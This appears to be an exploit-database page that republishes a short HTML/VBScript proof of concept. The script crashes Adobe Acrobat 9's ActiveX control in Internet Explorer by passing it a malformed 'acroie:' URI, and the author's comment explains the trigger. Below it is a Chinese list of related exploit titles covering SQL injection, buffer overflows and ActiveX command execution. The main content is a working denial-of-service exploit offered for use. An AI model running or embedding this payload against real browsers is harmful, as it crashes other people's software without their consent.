<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript> arg1="acroie:///DoS"
target.src = arg1 </script>
</body></html>
【Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit】相关文章:
★ webEdition CMS (we_objectID) Blind SQL Injection Exploit
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit
★ BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit